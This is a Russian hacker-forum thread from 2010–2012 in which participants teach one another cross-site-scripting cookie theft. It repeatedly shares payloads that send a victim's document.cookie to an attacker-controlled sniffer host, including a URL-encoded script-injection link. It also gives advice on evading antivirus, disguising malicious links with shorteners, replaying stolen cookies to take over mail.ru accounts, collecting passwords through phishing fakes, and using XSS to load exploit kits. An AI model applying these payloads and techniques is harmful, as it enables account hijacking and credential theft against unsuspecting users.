14.07.2010, 01:00
Цитата:

Сообщение от NITROS

https://hpc.name/redirector.php?url=...es%2F82so39l4x (https://hpc.name/redirector.php?url=http%3A%2F%2Fdepositfiles.com%2 Ffiles%2F82so39l4x)
и что это ты за ссылку дал блиН?

Не понял, а чем ссылка не нравится? Если бы ты был малеко внимательней, то мог бы заметить что на форуме все внешние ссылки идут через редирект... Понимаешь? И не надо умничать.

crys01
14.07.2010, 01:00
Что не у кого нет вариантов как исполнить через залитую картинку формата jpg которая удаленно выполнится как php.
Пример: "Basic-auth" соответственно по логике и должен сработать смотрим пример

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



высказываемся по перспективам его применения в xss!

TambWolf
17.07.2010, 01:00
Цитата:

Сообщение от crys01

Авира ругается на ссылку сниффера,так же как каспер палит https://hpc.name/sniffer/
Может кто знает как обмануть авер или скрипт сниффа нормального посоветуете.....

Купи свой хостинг, залей сниффер (как я сделал) и антивирусы ругаться не будут :wink::yes::yahoo:

P S я использую php Based Sniffer 4.1 Multi

crys01
17.07.2010, 01:00
Цитата:

Сообщение от M@ZAX@KEP

Итак, нам нужно заиметь сей инвентарь - http-сниффер. Качаем (https://hpc.name/redirector.html#http://2d-portal.ucoz.ru/files/Sniffer.rar) и ставим сниффер моей сборки...

Авира ругается на ссылку сниффера,так же как каспер палит https://hpc.name/sniffer/
Может кто знает как обмануть авер или скрипт сниффа нормального посоветуете.....

crys01
18.07.2010, 01:00
Цитата:

Сообщение от tambwolf

Купи свой хостинг, залей сниффер (как я сделал) и антивирусы ругаться не будут :wink::yes::yahoo:
P S я использую php Based Sniffer 4.1 Multi

Ну так у меня снифф на хостинге, правда на бесплатном )))
Может поделишься сниффом php Based Sniffer 4.1 Multi

TambWolf
18.07.2010, 01:00
xss сначала найди (или купи), а потом уже в сниффер иди..

TambWolf
18.07.2010, 01:00
Держи =)

Скрытый текст (вы должны быть авторизованы и иметь 20 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Я еще использую пересылку на icq, но она не всегда приходит, нужно ее до конца настроить...

7-dimon-7
18.07.2010, 01:00
Короче я сделал так:
Залил свою картинку на НРС сниффер
В подпись на prosims.ru добавил

code:

http://httpz.ru/hkf744co8d.png?+document.cookie;

То что в коде - находится в теге , я не написал его (тэг) в коде, так как он показывает картинку со сниффера, нехочу шоб у кого-нить куки увели!
И короче вот:
[/URL][URL="https://hpc.name/redirector.html#http://www.radikal.ru"] (https://hpc.name/redirector.html#http://www.radikal.ru)IMAGE (https://hpc.name/redirector.html#http://s04.radikal.ru/i177/1007/07/4228f778d409.jpg) http://s04.radikal.ru/i177/1007/07/4228f778d409.jpg

как узнать куки?
Я сам затестил, на себе, куки у мя есть.

stink200
25.07.2010, 01:00
как зашифровать ссылку нормально ?я зашифровал её через http://meyerweb.com (https://hpc.name/redirector.html#http://meyerweb.com)
но она получается токая

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



то есть по ней нельзя перейти чтобы куки пришли, только если её всю скопировать и вставить в адресную строку .Эта можно исправить?
о а тут можно перейти по ней ,а когда я отпровляю её в личку то не получается

M@ZAX@KEP
26.07.2010, 01:00
stink200, о, да этож магия! :ag:
Чтоб можно было перейти, нужно оформлять ссылку как ссылку, а не просто текст фикачить. Например, на форумах есть для этого тег [url], на мыло ... погугли синтаксис нужных тебе тегов.

crys01
26.07.2010, 01:00
Цитата:

Сообщение от stink200

как зашифровать ссылку нормально ?я зашифровал её через http://meyerweb.com (https://hpc.name/redirector.html#http://meyerweb.com)
но она получается токая *** скрытый текст ***
то есть по ней нельзя перейти чтобы куки пришли, только если её всю скопировать и вставить в адресную строку .Эта можно исправить?
о а тут можно перейти по ней ,а когда я отпровляю её в личку то не получается

Не везде тем более в личках ссылки кликабельны... Тоесть они как обычный текст..

Добавлено через 1 минуту

Цитата:

Сообщение от crys01

на форумах есть для этого тег [url], на мыло ... погугли синтаксис нужных тебе тегов.

Конечно может быть и в урлах дело

alechka
27.07.2010, 01:00
Помогите!!!Проблема в том,что когда я открываю http://*******s.gif? (https://hpc.name/redirector.html#http://*******s.gif?) у меня не записываются логи и не переходит на гугле как задумана.В чем проблема?

M@ZAX@KEP
28.07.2010, 01:00
Когда просто открываешь картинку, и не должно переходить. Вот s.js переходит))

alechka
28.07.2010, 01:00
А кукисы почему не записываются???

alechka
29.07.2010, 01:00
M@ZAX@KEP спасибо.я разобрался,короче проблема была в хостинге.щас я сменил на holm.ru и нормально работает.Спасибо за снифер)
какой хостинг посоветуешь?

M@ZAX@KEP
29.07.2010, 01:00
alechka, потому что их нет, наверное)))
Когда переходишь по ссылке на s.js, записываются куки той страницы, где ты был до перехода. А если переходишь из пустого окна или только открытой новой вкладки... какие там кукисы-то? =)
ЗЫ если отчёт приходит - уже значит что всё работает))
ЗЗЫ кстати, а в сниффере везде адрес хоста-то своего вписал?

s0llo
31.07.2010, 01:00
:cheezy::cheezy:
Цитата:

Сообщение от DNSrus

А когда подставляешь код в принтабельное поле то этот текст нужно отправлять или только написав открывать исходный код?

нужно отправлять! :cheezy:

s0llo
31.07.2010, 01:00
Цитата:

Сообщение от DNSrus

ну я так и думал =)

https://forum.antichat.ru/thread20140.html (https://hpc.name/redirector.html#https://forum.antichat.ru/thread20140.html)

s0llo
31.07.2010, 01:00
Цитата:

Сообщение от DNSrus

а еще вопрос если код выглядит так &lt;/script>alert('XSS')&lt;script>
это значит что его отфильтровали и ничего нельзя сделать?

если отфильтровало функцией htmlspecialchars(), то ничего ни сделаешь!!!

gangsta15
08.08.2010, 01:00
Попробовал заливать код в картинку но ничего не выходит:

Цитата:



img = new Image();
img.src = "http://yourhost.com/s.gif?"+document.cookie;




Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы)

sulikoshka
08.08.2010, 01:00
Цитата:

Сообщение от gangsta15

Попробовал заливать код в картинку но ничего не выходит:

Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы)

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши

gangsta15
09.08.2010, 01:00
Цитата:

Сообщение от sulikoshka

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши

смотри) у меня есть сниффер замаскированный под картинку
s.gif

Цитата:






так же тот файл (которое мазахакер описывал) со следующим содержанием
img.gif

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




Так вот последний я хочу вставить на какой нибудь нужный мне сайт где изображения не обрабатываются () и чтобы как описывал мазахакер, когда оно подгружаться будет - в нем будет выполняться тот код

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




И так на мой сниффер (s.gif) будут приходить куки, но когда я вставляю этот файл (img.gif) он отображается "поломанной картинкой" т.е. ничего не подгружается и куков он не посылает =)

P.S. Наверное запутал) Я вообще правильно понял тот способ что описывал мазахакер? (последний "абзац" в первом посте)

M@ZAX@KEP
09.08.2010, 01:00
Извиняюсь конечно, но тут есть сведения, что способ не ахти какой рабочий... T_T но вобоще попробуй вместо .gif картинки юзать .php

M@ZAX@KEP
11.08.2010, 01:00
vonkolot, не проще ли для перехвата POST-запроса использовать скрипт, аналогичный тому, который записывает данные с фейка? Суть та же самая =)

vonkolot
11.08.2010, 01:00
у меня вопрос...пользуюсь этим снифером с начала создания темы...но как то не приходилось встречаться с POST запросами..Можно ли перехватывать этим сниффером POST запросы??

HEX xaKer
27.08.2010, 01:00
люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!

zet611
27.08.2010, 01:00
Цитата:

Сообщение от HEX xaKer

люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!

Советую посмотреть видео - http://depositfiles.com/ru/files/1p6w2m91m (https://hpc.name/redirector.html#http://depositfiles.com/ru/files/1p6w2m91m) (Видео от "SOKOL) там все по сифферу,+ ответ и наглядный показ на твой ответ.

kola2468
29.08.2010, 01:00
Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.

Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.

И на счёт userhost не понял, какой-нибудь дайте для примера.

M@ZAX@KEP
30.08.2010, 01:00
Цитата:


Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.



Все архивы в полном ажуре, не знаю у кого что битое. Говорят, некоторые авири уже на сам линк ругаются, отключаем, качаем, снова включаем если очень страшно xD

Цитата:


Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.



Цитата:


img = new Image(); img.src = "http://unet.phpnet.us/s/s.gif?"+document.cookie;



Всё наместе, даже выделил. Опять не знаю у кого что недописано.
Кстати, откудаж такие сведения, если архивы битые?

Цитата:


И на счёт userhost не понял, какой-нибудь дайте для примера.



Когда зальёшь сниффер на свой хостинг - вот URL-адрес твоего хоста тебе примером и будет))

Shady3000rf
15.09.2010, 01:00
можете разжевать?
Ужасна распрастраннёная узявимость типа

alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.
не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)

blueHack
15.09.2010, 01:00
Цитата:

Сообщение от Shady3000rf

можете разжевать?
Ужасна распрастраннёная узявимость типа

alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.
не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)

НЕЕЕ, сообщение такого типа:IMAGE (https://hpc.name/redirector.html#http://hacker-school.ucoz.ru/img/xss/1.png) http://hacker-school.ucoz.ru/img/xss/1.png

ПОМОГ +

Shady3000rf
15.09.2010, 01:00
ага) эм а что там в этом сообщение должно быть написано? что типо этого нельзя написать или что?:realangel:

M@ZAX@KEP
15.09.2010, 01:00
Shady3000rf, ничего не должно быть. Появление рамки сообщения (alert) свидетельствует о том, что код alert(); выполнился и есть XSS-уязвимость. (возможно внедрение другого произвольного кода)

SPA-MAS
29.09.2010, 01:00
други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS? или с любуго, который юзер посетил заранее? тоесть по сути, мне надо пароль с почты украсть допустим маил ру, мне надо именно пасивку или активку юзать маила ру, или любого другова сайта и если юзер раньше зашел на маил и потом прошел на сторонний мой сайт с XSS с смоим снифером я получу куки с маила ,или нет?

stan_q
29.09.2010, 01:00
Цитата:

Сообщение от SPA-MAS

други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS?

Да, и никак иначе

biara
13.10.2010, 01:00
а вот вопрос:
если не отоброжаются в исходнике символа <> а вместо них кодировки.
&lt;/script&gt;alert('XSS')&lt
это считается как xss?

Norton710
13.10.2010, 01:00
biara, попробуй в юникод перевести или в hex.. может поможет) лично я с такой же проблеммой столкнулся..

M@ZAX@KEP
14.10.2010, 01:00
biara, нет, это не xss, всё в точности до наоборот)) Это замена символов на соответствующие им текстовые коды в html, чтобы они не выполнялись, а просто отображались на странице.

Norton710
14.10.2010, 01:00
M@ZAX@KEP, это возможно обойти? допустим сменой кодировки?

M@ZAX@KEP
15.10.2010, 01:00
Norton710, не сменой кодировки, а другими хитрыми манипуляциями... читай:
раз (https://hpc.name/redirector.html#http://ha.ckers.org/xss.html)
два (https://hpc.name/redirector.html#http://heideri.ch/jso/)
ЗЫ честно скажу, что пока сам не во многом там разобрался))

Norton710
15.10.2010, 01:00
Пролистал все скрипты на обоих сайтах.. в каждом скрипте есть либо ><" ...

M@ZAX@KEP
16.10.2010, 01:00
Цитата:


что самый часто встречаемый фильтр - перекодировка символов ><" ...



Это простая функция в php:

code:

htmlspecialchars($string);

Добавлено через 1 минуту
Кстати, тоже щас задумался над этим, сижу листаю _http://www.google.com/search?q=обход+htmlspecialchars&ie=utf-8&oe=utf-8 ))

Добавлено через 7 минут
Не обнадёжило...(( (https://hpc.name/redirector.html#http://forum.inattack.ru/index.php?showtopic=6750&view=findpost&p=38288)

Norton710
16.10.2010, 01:00
M@ZAX@KEP, прикольно.. тоесть XSS по всему сайту отпадает? Т.к. на каждой странице будет вбит скрипт на изменение <>" и обойти его никак нельзя =/

Но раз XSS жива, значит народ как-то обходит этот фильтр =) Имхо, надо искать скрипт, без использования " и <>.. я пару раз такие встречал, только внимание не обращал)

p.s. На хаккере нашел статью по XSS вакцинам
Вот что там пишут на эту тему:

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



ссылка - http://www.xakep.ru/magazine/xs/075/050/1.asp (https://hpc.name/redirector.html#http://www.xakep.ru/magazine/xs/075/050/1.asp)

Я так понимаю что речь идёт про условия (если то-то, то делать то-то), но как это помогает обойти фильтр? О.о Лично я недопонял =/

M@ZAX@KEP
19.10.2010, 01:00
На хост заливать всё. Безо всяких винраров. Мне кажется, я и так по заливке всё понятно написал.
if !(понятно) then {learn(hard);} else {do_not_ask_silly_questions(at_all);};

M@ZAX@KEP
19.10.2010, 01:00
Прошу в дальнейшем с вопросами, не касающимися непосредственно темы XSS, обращаться в другие разделы или соответствующие вашим вопросам темы.
Если вы не знаете, что такое хостинг, нечего вам вообще про xss читать.

8serega8
19.10.2010, 01:00
на файл base.txt права 777 не забываем ставить

Ето тип в этом текстовом документе,заместь карлючек тех написать 777

M@ZAX@KEP
19.10.2010, 01:00
8serega8, нет, нужно установить права доступа на хостинге к этому файлу равными 777. У себя на компе ты этого не найдёшь, поймёшь когда зальёшь файл на хост.

8serega8
19.10.2010, 01:00
А на хост заливать только script.js,или кинуть все это в WinRar..Или что??

Nikolay47
06.11.2010, 01:00
MAZAHACKER!!! спасибо за видео !!! намного лучше осваивать по такому уроку да и еще с коментариями )

M@ZAX@KEP
07.11.2010, 01:00
Nikolay47, дай активную xss - буду рад сделать и видюшку =)

Nikolay47
07.11.2010, 01:00
вот ВИДЕО про активную XSS на примере сайта одноклассники.... только вот для просмотра надо напрячь свои глаза )))
http://www.fayloobmennik.net/190217 (https://hpc.name/redirector.html#http://www.fayloobmennik.net/190217)

Nikolay47
07.11.2010, 01:00
МАЗАХАКЕР! а есть видюшка с активной XSS ?

Balin
20.11.2010, 01:00
Подскажите плиz хочу разобраться с XSS. Установил снифер на Denver, нашол сайт, где проходит пас. XSS . Хотя куков на сайте нет, пришло сообщение и сработал редерикт на googl . Вот только незадача Denver ругается в log на 24, 37, 38, 40, 51, 261 строках. Неужели дело в Denverе? я так понимаю желателено чтобы снифер был на онлайн хосте?

M@ZAX@KEP
20.11.2010, 01:00
Цитата:


я так понимаю желателено чтобы снифер был на онлайн хосте?



Да, иначе ни для кого кроме тебя он и существовать не будет, следовательно и использовать его не сможешь.

Цитата:


Вот только незадача Denver ругается в log в 24, 37, 38, 40, 51, 261



Честно? Ничерта не понял. Ну цыфарки... ну и что? xD

Balin
20.11.2010, 01:00
M@zAX@KER это строки в файле log.php взгляни пожалуйста http://www.picatom.com/1p/log2-2.html[/URL][URL="https://hpc.name/redirector.html#http://www.picatom.com/1p/log2-2.html"] (https://hpc.name/redirector.html#http://www.picatom.com/1p/log2-2.html)IMAGE (https://hpc.name/redirector.html#http://www.picatom.com/1p/log2-2-th.jpg) http://www.picatom.com/1p/log2-2-th.jpg

M@ZAX@KEP
20.11.2010, 01:00
Либо php в дэнвере коряво работает... либо я хз, ошибки в файле, но по идее-то файл рабочий (у меня ошибок небыло ни на локалхосте, ни сейчас в инете).

sulikoshka
25.11.2010, 01:00
Цитата:

Сообщение от sider56

получил на сниффер сие чудо
*** скрытый текст ***
чё с ним делать то??О_о

Opera Нажмите Ctrl+F12, перейдите на вкладку «Дополнительно» и откройте пункт Cookies.Выбираете из списка сайт нажимаете редактировать и вводите перехваченные данные.

Зы куки недолговечны

sider56
25.11.2010, 01:00
получил на сниффер сие чудо

Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



чё с ним делать то??О_о

Omeha2
26.11.2010, 01:00
Balin на ошибки "notice" не обращай внимание, а лучше отключи их отображение в начале скрипта, а вот варнинг пропадет сам когда отключиш нотисы...

M@ZAX@KEP
26.11.2010, 01:00
sulikoshka, ты забыл написать, что перед этим нужно авторизоваться на сервере, от которого получены куки.

Nick Hander
28.11.2010, 01:00
Цитата:

Сообщение от vitekis

А дай ссылку на видео!

http://depositfiles.com/ru/files/0el93vmjm (https://hpc.name/redirector.html#http://depositfiles.com/ru/files/0el93vmjm)
В начале темы ссылка выложена была... Смотреть надо внимательней, прежде чем задавать такие глупые вопросы.

maxarr
10.12.2010, 01:00
Активка http://play.nevasport.ru/game.php?id=111 (https://hpc.name/redirector.html#http://play.nevasport.ru/game.php?id=111)

alexanderk
12.12.2010, 01:00
Цитата:

Сообщение от M@ZAX@KEP

alexanderk, можно, добавляй! xD
А этот перехват - по сути своей фейк получается. так не проще сделать фейк?)

да да, спасибо, +0 я видел
У тебя вес репы = 0, ты не можешь ни минусить, ни плюсовать.

А как сделать то чтобы с постом ? я просто ещё новичок.

--------------------------------------------------------
а я даже и не знал, хотя я поставил но значет просто не засчиталось.

Zet

Да я не из за этого что палится может, просто если опять будет проблема с сайтом как вчера, то можно было пользоваться снифером своим который на хосте.

M@ZAX@KEP
12.12.2010, 01:00
alexanderk, можно, добавляй! xD
А этот перехват - по сути своей фейк получается. так не проще сделать фейк?)

Цитата:


+ от меня получил



да да, спасибо, +0 я видел
У тебя вес репы = 0, ты не можешь ни минусить, ни плюсовать.

Zet
12.12.2010, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 2 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

alexanderk
12.12.2010, 01:00
Можно ли добавить такую функцию в снифер "Перехват POST запроса" как на этом сайте такое есть ? мне вот только этого не хватает. а так всё супер. + от меня получил

M@ZAX@KEP
12.12.2010, 01:00
alexanderk, делай фейк нужного сайта. Это то же самое.

ЗЫ а что вчера с сайтом было? Я весь день спокойно сидел.

alexanderk
12.12.2010, 01:00
Цитата:

Сообщение от M@ZAX@KEP

alexanderk, делай фейк нужного сайта. Это то же самое.

ЗЫ а что вчера с сайтом было? Я весь день спокойно сидел.

имеется такой, но сделано так что приходит всё сюда на снифф с фейка.как сделать по другому не знаю.

M@ZAX@KEP
13.12.2010, 01:00
alexanderk, во всех темах по созданию фейка описано как складывать пароли в файлик на хосте. Отправку на почту можно нагуглить за пару минут.

А на наш сниффер неразумно, ибо палится даже не сама ссылка, а запрос по этому адресу.

Nick Hander
13.12.2010, 01:00
Цитата:

Сообщение от alexanderk

имеется такой, но сделано так что приходит всё сюда на снифф с фейка.как сделать по другому не знаю.

Можешь отправить перехваченный POST-запрос себе на мыло. Очень удобно.

nosorog5551
22.01.2011, 01:00
Глупый вопрос : А откуда взять сайты для взлома ? (всмысле что потренится) Я конечно понимаю ответ : Google всемогущий но как то хочу лоховский какой нибудь =)

frits06
22.01.2011, 01:00
Подскажите, я правильно понял. Для поиска XSS нужно вводить код alert('') в поля для ввода текста, типа как поля для ввода собщений и комментов на форумах и тому подобное? Заранее большое спасибо.

maxarr
22.01.2011, 01:00
Цитата:

Сообщение от frits06

Подскажите, я правильно понял. Для поиска XSS нужно вводить код alert('') в поля для ввода текста, типа как поля для ввода собщений и комментов на форумах и тому подобное? Заранее большое спасибо.

Да правильно понял, можно и нужно в различных вариациях, типа:

HTML highlight



alert('XSS')

">

alert('XSS')

'>">

alert(/XSS/)


А также в адресной строке вместо значения параметра..

frits06
22.01.2011, 01:00
Цитата:

Сообщение от maxarr

А также в адресной строке вместо значения параметра..

А пример можно? ))

Спасибо за обьяснение + в репу!

maxarr
22.01.2011, 01:00
Вот здесь (https://hpc.name/showthread.php?t=22057) куча примеров))

nicklayk
20.03.2011, 01:00
M@Z@XAKEP, вы уверены что config в вашем сниффере правилен?
Просто когда я вхожу на сайт ввожу логин и пароль прописанный в конфиге, меня всё время перекидывает на форму ввода логина и пароля, не знаю даже что делать.

maxarr
20.03.2011, 01:00
Там всё правильно)
Похоже что-то не так прописано у тебя..Если перекидывает, значит не соответствует логин или пасс, или всё вместе.)

nicklayk
20.03.2011, 01:00
Что у меня может быть не так?

[H]acke[R]
26.03.2011, 01:00
IMAGE (https://hpc.name/redirector.html#http://s41.radikal.ru/i094/1103/4a/3865370e38a0.jpg) http://s41.radikal.ru/i094/1103/4a/3865370e38a0.jpg

Как быть?

M@ZAX@KEP
26.03.2011, 01:00
[H]acke[R], ставить в начале твоего кода не одинарную, а двойную кавычку.

[H]acke[R]
26.03.2011, 01:00
Цитата:

Сообщение от M@ZAX@KEP

[H]acke[R], ставить в начале твоего кода не одинарную, а двойную кавычку.

" фильтрует.

M@ZAX@KEP
27.03.2011, 01:00
Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?

lagranj
12.04.2011, 01:00
Цитата:

Сообщение от M@ZAX@KEP

В статье подробно рассматриваются многие способы обхода фильтрации. Особенно рекомендую тем, кто в теме xss достаточно хорошо разобрался, так сказать, для углубленного изучения :smartass:
Кого заинтересовало - почитать можно тут. (https://hpc.name/text/index.php?mid=720)

Ссылочка битая

M@ZAX@KEP
12.04.2011, 01:00
Обожемой, удалили... печальбида, тоскаобида. Оригинал тут. (https://hpc.name/redirector.html#http://www.xakep.ru/magazine/xa/130/062/1.asp)

Тот пост тоже подправил, спасибо.

[H]acke[R]
12.04.2011, 01:00
Цитата:

Сообщение от M@ZAX@KEP

Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?

HTML highlight


alert()" name="search"/>

lagranj
12.04.2011, 01:00
а бесплатный хостинг для снифера посоветуете актуальный?

[H]acke[R]
12.04.2011, 01:00
Цитата:

Сообщение от lagranj

а бесплатный хостинг для снифера посоветуете актуальный?

holm.ru

Добавлено через 1 минуту

Цитата:

Сообщение от M@ZAX@KEP

Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?

HTML highlight


alert()" name="search"/>

Добавлено через 17 минут

Цитата:


Способ 3: кодируем в url ядовитую часть ссылки. Кодировать можно тут. Получим ссылку такого вида:

Цитата:


httр://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascrip t%20src%3Dhttp% 3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js%3E%3C%2FSCRIPT% 3E%22



Кодировать лучше тут (https://hpc.name/redirector.html#http://ha.ckers.org/xss.html)
Было :

PHP highlight



http://site.com/index.php?page="





Стало:

code:

http://site.com/index.php?page=%3C%53%43%52%49%50%54%20%74%79%70%6 5%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74% 20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%74%74%70%7A %2E%72%75%2F%67%34%63%75%77%6C%34%38%65%64%67%6F%2 E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%22

narviss
12.04.2011, 01:00
Цитата:

Сообщение от M@ZAX@KEP

Способ 1: топаем на tinyurl.com и вбиваем туда нашу ссылку. Получаем в результате другую... короткую и загадочную :wink: А результат её работы - тот же :banana:

xD лучше уже вместо tinyurl.com, сокращать ссылки на лохе (https://hpc.name/redirector.html#http://loh.ru/)

Больше ведь народу поверят, и ссылка начинается с loh.ru и будет интересно вообще, кто там, что про тя написал =)

[H]acke[R]
12.04.2011, 01:00
Цитата:

Сообщение от narviss

xD лучше уже вместо tinyurl.com, сокращать ссылки на лохе (https://hpc.name/redirector.html#http://loh.ru/)

Больше ведь народу поверят, и ссылка начинается с loh.ru и будет интересно вообще, кто там, что про тя написал =)

ну это на реальных лохов.
Но если человек смотрит на ссылку то все же мой вариант лучше.

M@ZAX@KEP
13.04.2011, 01:00
Наверное, облом. Из двойных кавычек ты тут не вылезешь, если они фильтруются.

pantoderm
11.10.2011, 01:00
Что-то на сниффер вообще никакие записи не приходят.
Редирект выполняется.
При cмене хоста на "holm", на секунду при обновлении лога вылазит: STAT.SU
Кто что может посоветовать?

DaRn1k
03.02.2012, 01:00
спасибо, информация будет полезна в будущем, автору респект

M@ZAX@KEP
07.02.2012, 01:00
Genua, читайте про связки сплойтов \ сплойт-паки.
XSS можно использовать чтобы вставить фрейм на связку сплойтов.

Genua
07.02.2012, 01:00
Всем привет) в статье говорилось, что с помощью XSS можно залить эксплойт, это можно с активной сделать?? Где я могу про это почитать(статья)?

Genua
08.02.2012, 01:00
M@ZAX@KEP, спс за инфу))

M@ZAX@KEP
15.02.2012, 01:00
Поясняю: читать статью, там всё написано.

geniy_07
15.02.2012, 01:00
Как я понял все http://yourhost.com/s.gif? (https://hpc.name/redirector.html#http://yourhost.com/s.gif?) в файлах codes.htm и script.js надо заменить на "Картинка 1x1px" из этого сниффера(это все сделал). Если ошибаюсь то поправь. НО не въезжаю как настроить что бы как в твоем видео был виден лог и т.д. Объясни плз

geniy_07
15.02.2012, 01:00
Не пояснишь как твой снифер настроить? или как работать с самодостаточными XSS на этом снифере.

M@ZAX@KEP
16.02.2012, 01:00
geniy_07, я вообще ни слова не говорил про сниффер, который у нас здесь (https://hpc.name/sniffer/). -)
Заменить это всё нужно на адрес своего хостинга со сниффером.

vostokrusi
22.03.2012, 01:00
Спасибо за статью.Подскажите,что да как.Если можно-детально.
Как мне сделать редирект с сайта на котором xss,на свой.
Чтобы люди переходили на тот сайт,а их редиректило на мой.
Спасибо заранее

Rastamancik
23.03.2012, 01:00
Вот такие люди и нужны саиту каторые знают чё нужно народу спс тебе што стараешся)))И не поленился ишё и видео зделать)))

M@ZAX@KEP
23.03.2012, 01:00
Цитата:


Спасибо за статью.Подскажите,что да как.Если можно-детально.
Как мне сделать редирект с сайта на котором xss,на свой.
Чтобы люди переходили на тот сайт,а их редиректило на мой.
Спасибо заранее



В статье приведён пример кода, который выполнит редирект. В самом-самом начале.

Suicide[VII]
16.04.2012, 01:00
Очень помогло.. нашел xss при помощи тега - .

KzBOXer
20.04.2012, 01:00
M@ZAX@KEP

Отличная статья и видео-урок! Очень помогло в разборе полета этих хитростей

KzBOXer
08.05.2012, 01:00
Сейчас потренировался - в хроме не работает. Думал сам где-то косячу, проверил оперу и мозилу все отлично. Пробовал rad.com и rastaman.tales.ru

Nick Hander
08.05.2012, 01:00
В хроме встроена защита от исходящих xss-атак в get и post запросах. Точнее фильтруются наиболее банальные комбинации типа

code:

">alert()

и т.д. Либо обходить с помощью других способов (копать в сторону javascript атрибутов тэгов и других способов внедрения года для обхода фильтра) либо находить и использовать активные xss. Потому как когда код выводится с сервера, он всегда будет работать. А когда выполняется отправленный в запросе код на странице, то хром его блокирует.

KzBOXer
08.05.2012, 01:00
Да уж, думал хром хороший и добрый.
Ну он таким и является, а жаль.

А слушайте, на типичном форуме можно пассивку надыбать?

ZeroCold
09.05.2012, 01:00
По опыту могу сказать, что даже на крупных проектах, типа mail.ru и т.д. можно найти пассивку, с активной все намного сложнее. Недавно чисто для прикола взял из топа маил ру топовые сайты инет магазинов, в каждом третьем есть пассивка. Так что и форум в принципе не проблема, особенно если исходники открытые, можно более тщательно поискать

Nick Hander
09.05.2012, 01:00
Смотря какой форум.

M@ZAX@KEP
10.05.2012, 01:00
KzBOXer, поизвращайся если хочешь запустить в хроме. =) Можешь поискать совместимые векторы тут (https://hpc.name/redirector.html#http://html5sec.org/).

The_CJ
16.06.2012, 01:00
Я не знаю! пассивка у меня не хочет работать! Пробовал на rad.com, делал всё в точности по видео, разве-что пользовался не localhost а hut.ru.. вставляю скрипт, всё так-же, даже сравнил, редирект идёт, а лог чистый как и был, если просто ссылку на s.gif то всё приходит, а так нет.. что может быть не так?

M@ZAX@KEP
16.06.2012, 01:00
Там закрыли пассивку сто лет как.

lex1094
24.07.2012, 01:00
Что-то я не совсем понял как внедрять XSS.
Нашёл активную XSS на сайте (в форме входа). Как теперь внедрить туда JavaScript-код который дан в сниффере, что бы cookies приходили мне на сниффер?
P.S. При активной XSS нужно будет жертве давать ссылку или она (XSS) будет в коде страницы до тех пор, пока админ её не спалит?

Nick Hander
24.07.2012, 01:00
Цитата:


Нашёл активную XSS на сайте (в форме входа). Как теперь внедрить туда JavaScript-код который дан в сниффере, что бы cookies приходили мне на сниффер?



Ну в общем, у тебя например прошло

code:

">alert()

